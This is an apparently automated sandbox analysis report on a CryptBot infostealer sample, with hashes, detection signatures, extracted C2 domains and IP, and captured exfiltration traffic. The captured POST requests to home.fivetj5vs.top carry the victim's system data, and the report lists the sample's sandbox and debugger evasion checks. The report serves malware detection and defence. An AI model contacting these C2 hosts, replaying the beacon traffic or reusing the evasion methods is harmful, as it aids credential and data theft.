
Windows Analysis Report
FYQ6Ee6gbS.exe

Overview

General Information

Sample name: FYQ6Ee6gbS.exe (renamed because original name is a hash value)
Original sample name: 1149dc52a38ac45de7ba2d62192c2918.exe
Analysis ID: 1588874
MD5: 1149dc52a38ac45de7ba2d62192c2918
SHA1: cb07a903a94b3d04813ae3ce1b24d48ddfb970ed
SHA256: 0b7e5470a3e798aeb45bf3e5abfa0873031828744b92ecca69ea3594db368237
Tags: exe, user-abuse_ch

Detection

Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • FYQ6Ee6gbS.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\FYQ6Ee6gbS.exe" MD5: 1149DC52A38AC45DE7BA2D62192C2918)
  • cleanup
Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies and credit cards, and of creating screenshots of the infected system. All stolen data is bundled into a zip file that is uploaded to the C2.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
{"C2 list": ["home.fivetj5vs.tops.top", "home.fivetj5vs.top", ".1.1home.fivetj5vs.top", "a.dnspod.coms.top", "gPhome.fivetj5vs.top"]}
Source: Process Memory Space: FYQ6Ee6gbS.exe PID: 7508
Rule: JoeSecurity_Cryptbot_1
Description: Yara detected Cryptbot
Author: Joe Security
Strings: (none)
    No Sigma rule has matched
    Timestamp: 2025-01-11T06:36:26.951949+0100
    SID: 2059018
    Severity: 1
    Classtype: A Network Trojan was detected
    Source IP: 192.168.2.8
    Source Port: 49706
    Destination IP: 176.53.147.104
    Destination Port: 80
    Protocol: TCP

    AV Detection

    Source: FYQ6Ee6gbS.exe | Avira: detected
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387674fd4 | Avira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767 | Avira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17 | Avira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767?argument=0 | Avira URL Cloud: Label: malware
    Source: home.fivetj5vs.top | Avira URL Cloud: Label: malware
    Source: gPhome.fivetj5vs.top | Avira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767vvI | Avira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767http://home.fivetj5vs.top/enQdvpMCNJgKflSEBd | Avira URL Cloud: Label: malware
    Source: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387676963 | Avira URL Cloud: Label: malware
    Source: .1.1home.fivetj5vs.top | Avira URL Cloud: Label: malware
    Source: FYQ6Ee6gbS.exe.7508.1.memstrmin | Malware Configuration Extractor: Cryptbot {"C2 list": ["home.fivetj5vs.tops.top", "home.fivetj5vs.top", ".1.1home.fivetj5vs.top", "a.dnspod.coms.top", "gPhome.fivetj5vs.top"]}
    Source: FYQ6Ee6gbS.exe | Virustotal: Detection: 50%
    Source: FYQ6Ee6gbS.exe | ReversingLabs: Detection: 70%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: FYQ6Ee6gbS.exe | Joe Sandbox ML: detected
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: -----BEGIN PUBLIC KEY----- | 1_2_0024DCF0
    Source: FYQ6Ee6gbS.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 1_2_0028A5B0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 1_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 1_2_0028B560
    Source: FYQ6Ee6gbS.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_0022255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses | 1_2_0022255D
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_002229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle | 1_2_002229FF

    Networking

    Source: Network traffic | Suricata IDS: 2059018 - Severity 1 - ET MALWARE CryptBot CnC Checkin : 192.168.2.8:49706 -> 176.53.147.104:80
    Source: Malware configuration extractor | URLs: home.fivetj5vs.tops.top
    Source: Malware configuration extractor | URLs: home.fivetj5vs.top
    Source: Malware configuration extractor | URLs: .1.1home.fivetj5vs.top
    Source: Malware configuration extractor | URLs: a.dnspod.coms.top
    Source: Malware configuration extractor | URLs: gPhome.fivetj5vs.top
    Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
    Source: global trafficHTTP traffic detected: POST /enQdvpMCNJgKflSEBdde1736138767 HTTP/1.1Host: home.fivetj5vs.topAccept: */*Content-Type: application/jsonContent-Length: 442324Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 34 34 35 33 32 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 
65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 2
    Source: global traffic | HTTP traffic detected: GET /enQdvpMCNJgKflSEBdde1736138767?argument=0 HTTP/1.1 | Host: home.fivetj5vs.top | Accept: */*
    Source: global traffic | HTTP traffic detected: POST /enQdvpMCNJgKflSEBdde1736138767 HTTP/1.1 | Host: home.fivetj5vs.top | Accept: */* | Content-Type: application/json | Content-Length: 31 | Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d | Data Ascii: { "id1": "0", "data": "Done1" }
    Source: Joe Sandbox View | ASN Name: VANNINVENTURESGB VANNINVENTURESGB
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_002EA8C0 recvfrom | 1_2_002EA8C0
    Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
    Source: global traffic | HTTP traffic detected: GET /enQdvpMCNJgKflSEBdde1736138767?argument=0 HTTP/1.1 | Host: home.fivetj5vs.top | Accept: */*
    Source: global traffic | DNS traffic detected: DNS query: httpbin.org
    Source: global traffic | DNS traffic detected: DNS query: home.fivetj5vs.top
    Source: unknownHTTP traffic detected: POST /enQdvpMCNJgKflSEBdde1736138767 HTTP/1.1Host: home.fivetj5vs.topAccept: */*Content-Type: application/jsonContent-Length: 442324Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 34 34 35 33 32 30 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 
3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 2
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | server: nginx/1.22.1 | date: Sat, 11 Jan 2025 05:36:31 GMT | content-type: text/html; charset=utf-8 | content-length: 207 | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | server: nginx/1.22.1 | date: Sat, 11 Jan 2025 05:36:33 GMT | content-type: text/html; charset=utf-8 | content-length: 207 | Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387674fd4
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde17361387676963
    Source: FYQ6Ee6gbS.exe, FYQ6Ee6gbS.exe, 00000001.00000002.1588481868.00000000014F5000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1553280122.00000000014F2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767?argument=0
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767http://home.fivetj5vs.top/enQdvpMCNJgKflSEBd
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1588443862.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1554004988.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767vvI
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: FYQ6Ee6gbS.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
    Source: FYQ6Ee6gbS.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
    Source: FYQ6Ee6gbS.exe, FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: FYQ6Ee6gbS.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
    Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705

    System Summary

    barindex
    Source: FYQ6Ee6gbS.exeStatic PE information: section name:
    Source: FYQ6Ee6gbS.exeStatic PE information: section name: .idata
    Source: FYQ6Ee6gbS.exeStatic PE information: section name:
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_01564A291_3_01564A29
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_01564A291_3_01564A29
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_01564A291_3_01564A29
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_3_01564A291_3_01564A29
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002305B01_2_002305B0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00236FA01_2_00236FA0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0025F1001_2_0025F100
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002EB1801_2_002EB180
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005AE0501_2_005AE050
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005AA0001_2_005AA000
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002F00E01_2_002F00E0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002862101_2_00286210
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002EC3201_2_002EC320
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002F04201_2_002F0420
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005744101_2_00574410
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022E6201_2_0022E620
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002EC7701_2_002EC770
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005867301_2_00586730
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0028A7F01_2_0028A7F0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005A47801_2_005A4780
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002DC9001_2_002DC900
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022A9601_2_0022A960
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002349401_2_00234940
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_004DAAC01_2_004DAAC0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_003F6AC01_2_003F6AC0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_003B4B601_2_003B4B60
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_004DAB2C1_2_004DAB2C
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022CBB01_2_0022CBB0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00598BF01_2_00598BF0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005ACC901_2_005ACC90
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005A4D401_2_005A4D40
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_003E0D801_2_003E0D80
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0059CD801_2_0059CD80
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0053AE301_2_0053AE30
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00244F701_2_00244F70
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002EEF901_2_002EEF90
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002E8F901_2_002E8F90
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00572F901_2_00572F90
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002310E61_2_002310E6
